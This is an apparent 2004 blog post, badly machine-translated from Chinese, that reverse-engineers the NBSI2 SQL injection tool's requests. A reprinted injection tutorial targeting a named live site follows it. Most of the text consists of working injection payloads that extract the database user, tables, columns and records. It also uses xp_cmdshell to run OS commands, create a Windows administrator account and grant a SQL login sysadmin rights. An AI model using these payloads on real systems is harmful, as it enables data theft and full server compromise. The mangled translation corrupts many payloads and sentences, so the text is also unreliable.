NBSI2 internal functions to achieve big mystery, SQL injection is very popular, people who have used Xiaozhu's NB2 may know that this tool is close to invincible, and the rookie uses it. It can also put a station to black, but do not understand the injection The process can always be improved, it will never make it ~~ First, I am just a rookie, just studying SQL recently, just studying the NB2 injection process, the tool WSE, I believe everyone will not be unfamiliar, online everywhere Depending on, I will give an address, http://www.gxgl.com/soft/wse06b1.zip, which is a program used to monitor and modify the network to send and receive data, which can be used to help you debug the web application. Less nonsense, start, first find a SQL injection vulnerability site www.testdb.net, find an injection point: http://www.testdb.net/Article_read.asp? Id = 80 huh, WWW. Testdb.net This website is of course not existent.
Procedure, obtain the SQL Server database information to open the NB2, type the address: http://www.testdb.net/Article_read.asp? Id = 80, select "Get" mode, click "Detect" button, get the SQL Server database as follows Information: Unknown Sub-Query: Support Current User: Test User Permissions: DB_OWNER Current Library: TestDB TestB Take NB2 People should be familiar with the above content to explain to space% 2B interpretation is number,% 25 Explanation to% http / 1.1 200 ok // Return success HTTP / 1.1 500 INTERNAL Server Error Detect GET package information with WSE, as follows: get / atte_read.asp?id=80 http / 1.1 get /article_read.asp?id= 80% 20And% 20User% 2bchar (124) = 0 http / 1.1: article_read.asp? Id = 80 and user char (124) = 0 char (124) is character '|' get /article_read.asp?id= 80; declare% 20 @ a% 20INT - http / 1.1 is: article_read.asp? Id = 80; declare @a int-- // Decision Support multiple query get /article_read.asp?id=80 and% 20 (SELECT% 20count (1)% 20FROM% 20 [Sysobjects])> = 0 http / 1.1 accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, * / * user-agent: Microsoft URL Control - 6.00.8862 Host: www.testdb.net Connection: Keep-Alive Cache-Control: no-cache Cookie: articleid = 80% 3Bdeclare % 40a int% 2D% 2D; ASPSESSIONIDSSTCTTQD = ELLNNEIDCEEANBMOKAMGJGED namely: article_read.asp? ID = 80 and (Select Count (1) from [SysObjects])> = 0 // Judgment is No Support sub-query get /article_read.asp?id=80 and User+char(124 )=0 http / 1.1 accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, * / * User-Agent: Microsoft URL Control - 6.00.8862 Host: www.testdb.net Connection: Keep-Alive Cache-Control: no-cache Cookie: articleid = 80 and % 28Select count% 281% 29 from % 5Bsysobjects% 5D% 29% 3E% 3D0; aspsessionidsstcttqd = Ellnneidceeanbmokamgjged 即: article_read.asp? Id = 80 and user char (124) = 0 // gets the current user user is a built-in variable of SQLServer,
Its value is the user name currently connected, and the type is nVarchar. Take a NVARCHAR comparison with INT 0, the system will try to turn nvarchar's value to int type. If the process will definitely go wrong, of course, the process of turns will definitely error, SQL Server's error prompt is: will NVARCHAR VAT "EAST_ASP" transitions the syntax error when the data type is an int, huh, huh, EAST_ASP is the value of the variable user, so that the power of the database is not scrapped. And user> 0 get /article_read.asp?id=80 and cast (is_srvrolemember(0x730079007300610064006d0069006e00 ) AS varchar(1 )+char (124) = 1 http / 1.1 accept: image / gif, image / x- Xbitmap, Image / JPEG, Image / PJPEG, * / * User-agent: Microsoft URL Control - 6.00.8862 Host: www.testdb.net connection: Keep-alive cache-control: no-cache cookie: articleid = 80 and % 28Select count% 281% 29 from % 5Bsysobjects% 5D% 29% 3E% 3D0; ASPSESSIONIDSSTCTTQD = ELLNNEIDCEEANBMOKAMGJGED namely:? article_read.asp id = 80 And Cast (IS_SRVROLEMEMBER (0x730079007300610064006D0069006E00) as varchar (1)) char (124 ) = 1 Function Description: Is_srvroleMember indicates whether the current user login is a member of the specified server role. Syntax is_srvrolemember ('role' [, 'login']) parameter 'role' The name of the server role is checked. Role's data type is sysname. The Role valid value is: sysadmin, dbcreator, diskadmin, processadmin, serveadmin, etcpadmin, securityadmin 'login' will check the optional name of the login. Login's data type is sysname, the default value is NULL. If not specified, use the current user's login account.
select Cast (IS_SRVROLEMEMBER (0x730079007300610064006D0069006E00) as varchar (1)) char (124) result is "1 |" GET /article_read.asp?id=80 And Cast(IS_MEMBER(0x640062005F006F0077006E0065007200) as varchar(1)) % 2bchar (124) = 1 HTTP / 1.1 Accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, * / * user-agent: Microsoft URL Control - 6.00.8862 Host: www.testdb. net Connection: Keep-Alive Cache-Control: no-cache Cookie: articleid = 80 and % 28Select count% 281% 29 from % 5Bsysobjects% 5D% 29% 3E% 3D0; ASPSESSIONIDSSTCTTQD = ELLNNEIDCEEANBMOKAMGJGED namely: article_read.asp? ID = 80 and cast (IS_MEMBER (0x640062005006f0077006e0065007200) As varchar (1)) char (124) = 1 Select Cast (is_member (0x640062005f006f0077006e0065007200) As varchar (1)) char (124) result is "1 |", and above Like the result, but pay attention to the long string in is_member, it is different. I don't know what it means. 0x730079007300610064006D0069006E00 is transformed into "| o | @ e", this thought it was "sysadmin" similar string, but It seems not, forget it, don't want it, huh, but I think, its role should be the right to get the current user, such as: db_owner get /article_read.asp?id=80 and db_name( )+chame (124) = 0 http / 1.1 accept: image / gif, image / x-xbitmap, IMA GE / JPEG, Image / PJPEG, * / * User-agent: Microsoft URL Control - 6.00.8862 Host: www.testdb.net connection: keep-alive cache-control: no-cache cookie: articleId = 80 and % 28selectElect count% 281% 29 from % 5Bsysobjects% 5D% 29% 3E% 3D0; ASPSESSIONIDSSTCTTQD = ELLNNEIDCEEANBMOKAMGJGED namely:? article_read.asp id = 80 And db_name () char (124) = 0 this one, see a db_name () Functions, don't say more, everyone should know, db_name () is another system variable, returning to the connected database name. At the time, the process of obtaining the SQL database information is calculated that the analysis is complete.
In addition: The post method is no longer analyzed in detail. You can look at it yourself. Below is the package captured when the Post method is, the specific is basically the same as the GET method, mainly to see the last line information. Among them, many techniques are also used: Id = 80% 20and% 20User% 2bchar (124) = 0 ID = 80 '% 20and% 20User% 2bchar (124) = 0% 20And% 20' = 'ID = 80% 25 '% 20And% 20User% 2bchar (124) = 0% 20And% 20'% 25 '=' ID = 80% 20and% 201 = 1 ID = 80% 20and% 201 = 2 ID = 80 '% 20and% 201 = 1% 20AND% 20 '' = 'ID = 80'% 20and% 201 = 2% 20And% 20 '' = 'ID = 80% 25'% 20And% 201 = 1% 20and% 20 '% 25' = 'ID = 80% 25 '% 20And% 201 = 2% 20And% 20'% 25 '=' // Process 2 % 20CAST (Name% 20AS% 20varchar (8000))% 20FROM (SELECT% 20top% 201% 20ID, Name% 20FROM% 20 [TestDB] .. [Sysobjects]% 20where% 20XTYPE = CHAR (85)% 20ORDER% 20by% 20ID)% 20T% 20ORDER% 20BY% 20ID% 20DESC)> 0 http / 1.1: article_read.asp? Id = 80 and (select top 1 cast (Name as varcha (8000)) from (SELECT TOP 1 ID, NAME FROM [testdb] .. [sysobjects] where xtype = char (85) ORDER BY ID) T ORDER BY ID DESC)> 0 char (85) = 'u' The role is the table name of the first table of the TESTDB database, The class push TOP N can get other table names.
TOP2 get /Article_read.asp?id=80 and (select top 1 cast (Name Ame 4 FROM (SELECT TOP 2% 20ID ,NAME% 20FROM% 20 [testdb ] .. [sysobjects]% 20where% 20XTYPE = CHAR (85)% 20ORDER% 20BY% 20ID)% 20T% 20RDER% 20BY% 20ID% 20DESC)> 0 http / 1.1 ... TOPN WSE capture package information: Get / Article_read.asp? id = 80% 20And% 20 (Select% 20top% 201% 20cast (Name% 20AS% 20Varchar (8000))% 20FROM (select% 20top% 201% 20ID, Name% 20FROM% 20 [TestDB].. [sysobjects]% 20where% 20XTYPE = CHAR (85)% 20ORDER% 20BY% 20ID)% 20T% 20RDER% 20BY% 20ID% 20DESC)> 0 http / 1.1 accept: image / gif, image / x-xbitmap, image / jpert , image / pjpeg, * / * User-Agent: Microsoft URL Control - 6.00.8862 Host: www.testdb.net Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDSSTCTTQD = ELLNNEIDCEEANBMOKAMGJGED; articleid = 80 and % 28select count% 281% 29 from % 5bsysObjects% 5D% 29% 3e% 3D0 ........... // process three, according to a table name guess list name: Article Top1 Get / Article_read.asp? id = 80% 20And% 20 (select% 20top% 201% 20cast (Name% 20AS% 20VARCHAR (8000))% 20FROM% 20 (select% 20top% 201% 20colid, NAME% 20FROM% 20 [testdb] .. 2BNCHAR (46)% 2BNCHAR (46)% 2BNCHAR (65)% 2BNCHAR (82)% 2BNCHAR (84)% 2BNCHAR (73)% 2BNCHAR (67)% 2BNCHAR (76)% 2BNCHAR (69))% 20ORDER% 20BY% 20Colid)% 20T% 20RDER% 20BY% 20Colid% 20Desc)> 0 http / 1.1: article_read.asp? Id = 80 and (select top 1 cast (Name as varchar (8000)) from (SELECT TOP 1 Colid, Name from [testdb] .. [syscolumn] where id = Object_id (nchar (101) nchar (97) nchar (115) nchar (116) nchar (104) nchar (111) nchar (116) nchar ( 46) nchar (46) nchar (65) nchar (82) nchar (84) nchar (73)
Nchar (67) NCHAR (76) NCHAR (69)) ORDER BY Colid) T ORDER BY Colid Desc)> 0 The role is to get the column name of the first column of the article table, and push TOP N, you can get other Column name. Function Description: Object_ID Returns the database object identification number. Syntax Object_ID ('Object') Parameter 'Object' The object to use. Object's data type is char or Nchar. If the data type of Object is char, it is hidden to convert it to nchar.
Return Type Int nchar (101) Nchar (97) Nchar (115) Nchar (116) Nchar (104) Nchar (111) Nchar (116) Nchar (46) Nchar (46) Nchar ( 65) nchar (82) nchar (84) nchar (73) nchar (67) nchar (76) nchar (69) Corresponds to string testdb..Aticle is: article_read.asp? Id = 80 AND (SELECT TOP 1 CAST (Name As Varchar (8000)) from (SELECT TOP 1 Colid, Name from [Testdb] .. [Syscolumns] where id = Object_id ('testdb..article') Order by colid Colid desc)> 0 TOP2 GET /ATICLE_READ.ASP?id=80 and (select top 1 cast (Name AS varchar(8000 ) FROM (select top 2% 20colid, Name% 20FROM% 20 [TestDb] .. [Syscolumns]% 20where% 20ID% 20 =% 20object_ID (Nchar (101)% 2BNCHAR (97)% 2BNCHAR (115)% 2BNCHAR (116)% 2BNCHAR (104)% 2BNCHAR ( 111)% 2BNCHAR (116)% 2BNCHAR (46)% 2BNCHAR (46)% 2BNCHAR (65)% 2BNCHAR (82)% 2BNCHAR (84)% 2BNCHAR (73)% 2BNCHAR (67)% 2BNCHAR (76)% 2BNCHAR ( 69)% 20RDER% 20BY% 20Colid)% 20t% 20ORDER% 20BY% 20Colid% 20Desc)> 0 HTTP / 1.1 TOPN ... WSE captured package information: get /article_read.asp?id=80 and ( SELECT% 20top% 201% 20CAST (Name% 20AS% 20varchar (8000))% 20FROM% 20 (select% 20top % 201% 20Colid, Name% 20FROM% 20 [TestDB] .. [Syscolumns]% 20where% 20ID% 20 =% 20 Object_ID (nchar (101)% 2BNCHAR (97)% 2BNCHAR (115)% 2BNCHAR (116)% 2BNCHAR ( 104)% 2BNCHAR (111)% 2BNCHAR (116)% 2BNCHAR (46)% 2BNCHAR (46)% 2BNCHAR (65)% 2BNCHAR (82)% 2BNCHAR (84)% 2BNCHAR (73)% 2BNCHAR (67)% 2bnchar ( 76)% 2BNCHAR (69))% 20RDER% 20BY% 20COLID)% 20t% 20ORDER% 20BY% 20Colid% 20Desc)> 0 http / 1.1 accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg , * / * User-Agent: Microsoft URL Control - 6.00.8862 Host: www.testdb.net Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDSSTCTTQD = ELLNNEIDCEEANBMOKAMGJGED; articleid = 80 and % 28Select
COUNT% 281% 29 from % 5bsysObjects% 5D% 29% 3E% 3D0 ............... // process four, according to the column name guess field content field name: Title Top1 Get /article_read.asp?id=80 and (select top 1 20ISNULL (Cast ([Title] AS varchar (8000)), CHAR (32 )+char (124 )% 20FROM% 20 ( SELECT% 20top% 201% 20 [Title]% 20FROM% 20 [TestDb] .. [article]% 20where% 201 = 1% 20RDER% 20BY% 20 [Title])% 20T% 20RDER% 20BY% 20 [Title]% 20DESC)> 0 http / 1.1: article_read.asp? Id = 80 and (select top 1 isnull (CAST ([Title] As Varchar (8000)), Char (32)) Char (124) from (SELECT TOP 1 [Title] from [testdb] .. [article] where 1 = 1 ORDER BY [TITLE]) T ORDER BY [TITLE] DESC)> 0 The role is to obtain the value of the first row record of the title field, and push TOP N , You can get the value of other rows.
TOP2 get /Aarticle_read.asp?id=80 and (select top 1 20ISNULL (Cast ([Title] AS varchar (8000)), CHAR (32 )+char (124 )% 20FROM% 20 (Select% 20top% 202% 20 [Title]% 20FROM% 20 [testdb] .. [article]% 20where% 201 = 1% 20RDER% 20BY% 20 [Title])% 20T% 20RDER% 20BY% 20 [Title ]% 20DESC)> 0 HTTP / 1.1 TOPN ... WSE captured package information: // get the number of records of the article table get /article_read.asp?id=80 and (select cast(count(1 )% 20AS% 20Varchar (8000))% 2bchar (124)% 20FROM% 20 [TestDb] .. [article]% 20where% 201 = 1)> 0 http / 1.1 accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, * / * User-Agent: Microsoft URL Control - 6.00.8862 Host: www.testdb.net Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDSSTCTTQD = ELLNNEIDCEEANBMOKAMGJGED; articleid = 80 and % 28select count% 281% 29 from % 5BSYSObjects% 5D% 29% 3E% 3D0 // get the first record content of the Title field of the article table Get /Article_read.asp?id=80 and (seLect% 20top% 201% 20isnull (CAST ([Title]% 20AM 20VARCHAR (8000)), CHAR (32))% 2BCHAR (124)% 20FROM% 20 (SELECT% 20top% 201% 20 [Title]% 20FROM% 20 [ Testdb] .. [article]% 20where% 201 = 1% 20o Rder% 20BY% 20 [Title])% 20T% 20RDER% 20BY% 20 [Title]% 20DESC)> 0 http / 1.1 accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, * / * User-Agent: Microsoft URL Control - 6.00.8862 Host: www.testdb.net Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDSSTCTTQD = ELLNNEIDCEEANBMOKAMGJGED; articleid = 80 and % 28Select count% 281% 29 from % 5BSYSObjects% 5D% 29% 3E% 3D0 ............... Analysis of other main functions.
Procedure 5, execute the DOS command and execute the SQL statement to execute the DOS command DIR C: / return capture package analysis: get /art1_read.asp?id=80 and db_name()+char(124 )=0 http / 1.1 accept: Image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, * / * user-agent: Microsoft URL Control - 6.00.8862 Host: www.testdb.net connection: Keep-alive cache-control: no- cache Cookie: ASPSESSIONIDSSTCTTQD = ELLNNEIDCEEANBMOKAMGJGED; articleid = 80 and % 28Select count% 281% 29 from % 5Bsysobjects% 5D% 29% 3E% 3D0 GET /article_read.asp?id=80;EXEC MASTER..XP_CMDSHELL 'DIR% 20C: /% 20>% 20c: /nb_commander_txt.log'; DROP% 20Table% 20NB_Commander_TMP; CREATE% 20TABLE% 20NB_Commander_TMP (ResultTXT% 20NULL); Bulk% 20Nsert% 20 [TestDB] .. [NB_COMMANDER_TMP]% 20FROM% 20'c: /nb_commander_txt.log' With (KeepnUlls); ALTER% 20table% 20NB_Commander_TMP% 20NOT% 20NULL% 20IDENTITY% 20 (1) - HTTP /1.1 Accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, * / * user-agent: Microsoft URL Control - 6.00.8862 Host: www.testdb.net connection: Keep-alive cache- Control: no-cache cookie: ASPSE SSIONIDSSTCTTQD = ELLNNEIDCEEANBMOKAMGJGED; articleid = 80 and % 28Select count% 281% 29 from % 5Bsysobjects% 5D% 29% 3E% 3D0 is mainly this:? Article_read.asp id = 80; EXEC MASTER..XP_CMDSHELL 'Dir C: /> C: /NB_Commander_Txt.log '; DROP TABLE NB_Commander_Tmp; CREATE TABLE NB_Commander_Tmp (ResultTxt varchar (7996) NULL); BULK INSERT [testdb] .. [NB_Commander_Tmp] FROM' C: /NB_Commander_Txt.log 'WITH (KEEPNULLS); ALTER TABLE NB_COMMANDER_TMP Add ID INT Not Null Identity% 20 (1, 1) - BULK INSER Copy a data file to the database table or view in the format specified by the user. KeepnUlls Specifies a null value in a large-capacity replication operation, rather than assigns the default value to the inserted column. For details, please check the T-SQL syntax, which is described in detail.
The function of the above statement is to save the result of the DOS command DIR C: / to a file nb_commander_txt.log, then write the contents of this file to the new temporary table NB_COMMANDER_TMP, and add a self-growth field ID, I believe everyone It is easy to understand. ID = 1 get / atte_read.asp?id=80 and (select top 1 case When Resulttxt 2010null Then '|' ELSE Resulttxt% 2B '|'% 20nd % 20FROM% 20NB_Commander_TMP% 20where% 20ID = 1) = 0 http / 1.1 accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, * / * user-agent: Microsoft URL Control - 6.00.8862 Host: www.testdb.net Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDSSTCTTQD = ELLNNEIDCEEANBMOKAMGJGED; articleid = 80% 3BEXEC MASTER% 2E% 2EXP% 5FCMDSHELL % 27Dir C% 3A% 5C % 3E C % 3A% 5CNB% 5FCommander% 5FTxt% 2Elog% 27% 3BDROP TABLE NB% 5FCommander% 5FTmp% 3BCREATE TABLE NB% 5FCommander% 5FTmp% 28ResultTxt varchar% 287996% 29 NULL% 29% 3BBULK INSERT % 5Btestdb % 5D% 2E% 2E% 5BNB% 5Fcommander% 5FTMP% 5D FROM % 27C% 3A% 5CNB% 5Fcommander% 5FTXT% 2ELOG% 27 with % 28 Keepnulls% 29% 3Balter Table NB% 5Fcommander% 5FTMP Add ID INT NOT NULL IDENTITY % 281% 2C1% 29% 2D% 2D 即: article_read.asp? id = 80 and (select top 1 Case When ResulttxtX Null Ten "| 'Else Resulttxt ' | 'end from nb_commander_tmp where ID = 1) = 0 Enter the first echo result, the same, T OPN Enter all echo results.
ID = 2 get / at /read.asp?id=80 and (select top 1 case When Resulttxt 0 null Then '|' ELSE Resulttxt% 2b '|'% 20END % 20FROM% 20NB_Commander_TMP% 20where% 20ID = 2) = 0 http / 1.1 accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, * / * user-agent: Microsoft URL Control - 6.00.8862 Host: www.testdb.net Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDSSTCTTQD = ELLNNEIDCEEANBMOKAMGJGED; articleid = 80% 3BEXEC MASTER% 2E% 2EXP% 5FCMDSHELL % 27Dir C% 3A% 5C % 3E C % 3A% 5CNB% 5FCommander% 5FTxt% 2Elog% 27% 3BDROP TABLE NB% 5FCommander% 5FTmp% 3BCREATE TABLE NB% 5FCommander% 5FTmp% 28ResultTxt varchar% 287996% 29 NULL% 29% 3BBULK INSERT % 5Btestdb % 5D% 2E% 2E% 5BNB% 5Fcommander% 5FTMP% 5D FROM % 27C% 3A% 5CNB% 5Fcommander% 5FTXT% 2ELOG% 27 with % 28 Keepnulls% 29% 3Balter Table NB% 5Fcommander% 5FTMP Add ID INT NOT NULL IDENTITY % 281% 2C1% 29% 2D% 2D id = N ....................................................................................................................................................................................................................................................................................... ] [Unexpected output] [unexpected output] [unexpected output] [unexpected output] [unexpected output] [unexpected output] ... If there is no problem, it will output C: / The file, the above prompt, may be due to data table NB_COMM Ander_TMP has not created success, so it cannot be output correctly.
Do not return to the captain analysis: DOS command DIR C: / GET /ARTICLE_READ.ASP ?ID=80 ;ec master..dp_cmdshell 'dir c:/ '- http / 1.1 accept: image / gif, Image / x-xbitmap, image / jpeg, image / pjpeg, * / * User-Agent: Microsoft URL Control - 6.00.8862 Host: www.testdb.net Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDSSTCTTQD = ELLNNEIDCEEANBMOKAMGJGED; articleid = 80% 3BDROP TABLE NB% 5FCommander% 5FTmp% 3BEXEC MASTER% 2E% 2EXP% 5FCMDSHELL % 27DEL C% 3A% 5CNB% 5FCommander% 5FTxt% 2Elog% 27% 2D% 2D namely: article_read.asp ? id = 80; exec master "DIR C: / '- does not need to display output results. Output display: Command execution DOS command: net user tsinternetUsers password / add get /article_read.asp?id=80 ;ec master..xp_cmdshell 'Net User TSINTERNETUSERS Password /Add' - http / 1.1 Accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, * / * user-agent: Microsoft URL Control - 6.00.8862 Host: www.testdb.net connection: Keep-alive cache-control : no-cache cookie: aspsessionidsstcttqd = Ellnneidceeanbmokamgjged; ArticleID = 80% 3Bexec Master% 2E% 2EXP% 5FCMDSHELL % 27DIR C% 3A% 5C% 27% 2D% 2D Execute other DOS commands.
id = 80; EXEC MASTER..XP_CMDSHELL 'net user TsInternetUsers Password / add' - id = 80; EXEC MASTER..XP_CMDSHELL 'net localgroup administrators TsInternetUsers / add' - execute SQL command (command with execution Dos) GET / article_read .asp? id = 80; EXEC% 20master..sp_addlogin% 20USERNAME, Password - http / 1.1 accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, * / * user-agent: Microsoft URL Control - 6.00.8862 Host: www.testdb.net Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDSSTCTTQD = ELLNNEIDCEEANBMOKAMGJGED; articleid = 80% 3BEXEC MASTER% 2E% 2EXP% 5FCMDSHELL % 27net user TsInternetUsers Password % 2FADD% 27% 2D% 2D id = 80; exec master..sp_addlogin username, password - id = 80; exec master..np_addsrvrolemember username, sysadmin - ....Antere, NB2 main function analysis After that, other functions can analyze themselves, the first time to write such a long article, may be chaotic, there must be a lot of problems, but there must be no energy to revise, I hope everyone can understand. Thank you! Hnxyy 2004/11/26 night 10:30 Copyright Notice: 9CBS is this BLOG managed service provider. If this paper involves copyright issues, 9CBS does not assume relevant responsibilities, please contact the copyright owner directly with the article Author. [Click here to favor this article] Posted on November 26, 2004 7:51 PM Comments Reprinted, thank you! 2004-11-27 5:30 PM | Zer0R2y Don't say invincible good fortune 2004-11-27 9:09 PM | Tiger turn NB Xiaozhu tutorial SQL injection Tianship -ASP injection vulnerability introduction with B / S mode development development Programmers who use this model to write applications are getting more and more. However, due to the high entry threshold in this industry, the level and experience of programmers are uneven. A considerable part of the programmer does not judge the legality of the user input data when writing code, so that the application has security hazards. Users can submit a database query code, obtain certain data he wants, based on the result returned by the program, which is the so-called SQL INJECTION, that is, SQL injection. SQL injection is accessed from normal WWW port, and the surface looks with the general web page access, there is no difference in web page access, so the current market firewall will not issue an alert to SQL injection. If the administrator does not view the habit of IIS logs, it may be invaded Will not find out for a long time. However, the technique of SQL injection is quite flexible, and there will be many unexpected situations when injected. Can you analyze according to the specific situation, construct a smart SQL statement, from and successfully acquired the desired data, is the fundamental difference between the master and the "rookie".
According to national conditions, domestic websites use ASP Access or SQLServer to account for more than 70%, PHP MySQ accounts for L20%, and there are less than 10% of others. In this article, we will introduce the approach, advanced to high, explain the method and techniques of ASP injection, PHP injection articles written by another friend Zwell of the NB Alliance, I hope to use the security workers and programmers. For friends who know the ASP injection, please do not skip the entry, because some people have misunderstandings about the basic judgment methods of the injected. Are you ready? Let's Go ... Into the door If you haven't tried SQL injection before, then the first step will first put the IE menu => tool => Internet option => Advanced => Show friendly HTTP error message before the hook. Otherwise, no matter what the server returns, IE is only displayed as an HTTP 500 server error, and more prompt information cannot be obtained. In the first quarter, SQL injection principle begins with a website www.19cn.com (Note: This article has been approved by this station long agreed, most of them are real data). On the homepage of the website, there are "IE can't open a new window" link, the address is: http://www.19cn.com/showdetail.asp? Id = 49, we add this address after this address Single quotes ', the server will return the following error message: Microsoft Jet Database Engine Error' Syntax Error of '80040e14' Strings In Query Expressions 'ID = 49' ''. /SHOWDETAIL.ASP, line 8 From this error prompt we can see the following: 1. The website is used by the Access database, connects the database via the JET engine, not through ODBC. 2. The program does not determine whether the data submitted by the client meets the program requirements. 3. This SQL statement is inquired with a field of ID. From the above example we can know that the principle of SQL injection is to submit a special code from the client, resulting in the collection of procedures and servers, giving the information you want to get. In the second section, it is said that some people will feel that there are some people who can do it: I am not very simple to test, this is not very simple? In fact, this is not the best way, why? First, it is not necessarily that the IIS of each server is returned to the client. If the program is added to the client, if the program is added, SQL injection is not successful, but the server will also report an error, the specific prompt information is Error on the server when processing the URL. Please contact the system administrator.
Second, some of the programmers who have a little understanding of SQL injection is considered to be safe, this situation is not a few, if you use single quotes test, you can't measure the injection point, what kind of Is the test method be more accurate? The answer is as follows: 1 http://www.19cn.com/showdetail.asp?id=49 2 http://www.19cn.com/showdetail.asp?id=49 and 1 = 1 3 http: // www. 19cn.com/showdetail.asp?id=49 and 1 = 2 This is the classic 1 = 1, 1 = 2 test method, how to judge? See the result of the three URLs back to: I can inject: 1 Normal display (this is inevitable, it is the program has an error) 2 Normal display, the content is basically the same 3 prompt BOF or EOF (program Did not do any judgment), or prompting the record (when RS.eof) is not found, or the display is empty (the program adds to an ORROR RESUME NEXT), it is easier to judge, 1 is also normal display, 2 and 3 Generally there will be an error message defined by the program, or the prompt type conversion error. Of course, this is just the incoming parameter is the judgment method used by the digital type. When actual application, there will be character types and search type parameters, I will analyze the "SQL Injecting General Steps" in the intermediate level. Section III, determine the function of the database type and the injection method, the injection method is different, so we must judge the type of database before injection. General ASP's most frequently matched databases are ACCESS and SQLSERVER, one of more than 99% of websites online. How to let the program tell you what database it uses? Take a look: SQLServer has some system variables, if the server IIS prompt is not closed, and SQL Server returns an error prompt, then you can get directly from the error information, the method is as follows: http://www.19cn.com/showdetail.asp?id = 49 and user>; 0 This sentence is very simple, but it contains the essence of SQLServer's unique injection method. I also found this efficient susceptibility in a unintentional test. Let me see its meaning: First, the front statement is normal, focus on and user> 0, we know, User is a built-in variable of SQL Server, which is the user name currently connected, type NVARCHAR . Take a nVarchar value to the intra 0 comparison, the system will try to turn nvarchar's value to int type. Of course, the process will definitely errors in the process, and SQL Server error prompt is: convert the nVARCHAR value "ABC" conversion data type When INT's column, the syntax error occurs, huh, ABC is the value of the variable user, so that the power of the database is not scrapped. In the subsequent space, everyone will see a lot of statements with this method. By the way, it is well known that SQLServer's user sa is a role of equivominstrators permissions, got SA permissions, almost certainly gets the host's Administrator.
The above method can be very convenient to test whether it is logged in with sa, if it is SA login, the prompt is to convert "DBO" into an int to send errors, not "SA". If the server IIS is not allowed to return an error prompt, how do you determine the database type? We can start from Access and SQL Server and distinguish, Access and Sql Server have its own system table, such as storing all objects in the database, Access is in system table [msysObjects], but read the table in the web environment " No permissions, "SQL Server is in the table [sysObjects], which can be read normally in a web environment. In the case where you can inject, use the following statement: http://www.19cn.com/showdetail.asp?id=49 and (select count (*) from sysobjects> 0 http: //www.19cn. COM / ShowDetail.asp? id = 49 and (select count (*) from msysobject> 0 If the database is SQL Server, the page of the first URL with the original page http://www.19cn.com/showdetail.asp? ID = 49 is substantially the same; and the second URL, because the table MsysObjects can not be found, it will prompt the error, even if the program has fault tolerance, the page is completely different from the original page. If the database uses Access, then the situation is different, the page of the first URL is completely different from the original page; the second URL, depending on whether the database settings are allowed to read the system table, generally not allowed Therefore, it is also completely different from the original website. In most cases, use the first URL to know the database type used by the system, and the second URL uses only the verification when IIS error prompt. In the entry, we learned the judgment method of SQL injection, but it is not enough to get the confidential content of the website. Next, we continue to learn how to get the content you want to get from the database, first, let's take a look at the general steps in SQL injection: First, the general step of SQL injection first, determine the environment, find an injection point, determine the database Type, this has been introduced in the entry.
Secondly, according to the type of injection parameter, the original appearance of the SQL statement is reconstructed in the mind. According to the parameter type, the following three are the following: (a) ID = 49 This type of injection parameter is a digital type, and the SQL statement is roughly as follows: SELECT * From Name WHERE Field = 49 Injection parameters is ID = 49 and [Query Condition], that is, generated statement: SELECT * FROM table name where field = 49 and [query condition] (b) Class = Continuous drama This type of injection parameter It is a character pattern, and the SQL statement is generally approrated: select * from the name of the WHERE field = 'series of injected parameters Class = Continuous drama' and "query conditions] and '' = ', that is, generate statements: SELECT * FROM table Name WHERE Field = 'Continuous Play' AND [Query Condition] and '' = '(c) No filtering parameters, such as keyword = keyword, SQL statement original is as follows: SELECT * FROM table name Where Field Like'% Keyword% 'injection parameter is keyword =' AND [query condition] and '% 25' = ', that is, generating statement: SELECT * FROM table name Where Field Like'% 'AND [Query Condition] and'% '= '%' Next, replace the query condition into a SQL statement, guess the table name, for example: id = 49 and (select count (*) from admin> = 0 If the page is the same as ID = 49, the additional condition is established. That is, the table admin exists, but in turn, it does not exist (please keep this method). So loop until you guessed the name of the name. After guess, replace count (*) into a count (field name), and specifically depends the word name. Some people will say: There are some casual components here. If the name is very complicated, it will not have to play. It is very pair, this world does not exist 100% successful hacker technology, flies do not seamless eggs, no matter how many technologies, a few hackers, because others are not strict or not, the user is not confidential. I have to get it. I have a little bit, saying it back, for SQL Server library, there is a way to let the program tell us the name and field name, we will introduce in the advanced article. Finally, after the table name and column name are successful, use the SQL statement to get the value of the field, and the most common method is described below. Although this method is very slow, it must be feasible Methods.
We will give an example, known in the application of the username field, first, we take the first record, test length: http://www.19cn.com/showdetail.asp?id=49 and (SELECT TOP 1 LEN UserName)> 0 First Description Principle: If the username length of TOP 1 is greater than 0, the condition is established; then it is> 1,> 2,> 3 so that the conditions are not established, such as> 7 is established,> 8 is not established, that is, len (username) = 8 Of course, no one will be stupid from 0, 1, 2, 3 one test, how to look at each play. After obtaining the length of the username, the nth character is intercepted with MID (username, n, 1), and then ASC (MID (UserName, N, 1)) Gets the ASCII code, such as: ID = 49 and (SELECT TOP 1 ASC ( MID (username, 1, 1)) from admin> 0 is also the ASCII code of the first character with a step-by-step range, pay attention to between the English and numbers of ASCII code between 1-128, can be used for half Method Accelerate the guess, if the program is written, the efficiency will have great improvement. In the second section, the SQL injection common function has a SQL language-based person, and the success rate is much higher than when SQL injection is more than unfamiliar. We must improve our SQL level, especially some common functions and commands. Access: ASC (Character) SQLServer: Unicode (Character) Returning ASCII code Access: chr (number) SQLServer: nchar (Number) effect: In contrast to ASC, return character access: MID according to the ASCII code (string, N, l) SQLServer: Substring (String, N, L) Run: Returns the string from n characters from the sub string of the length L, ie a string access between N to N L: ABC (Digital) SQL Server: ABC (Digital) Role: Returns the 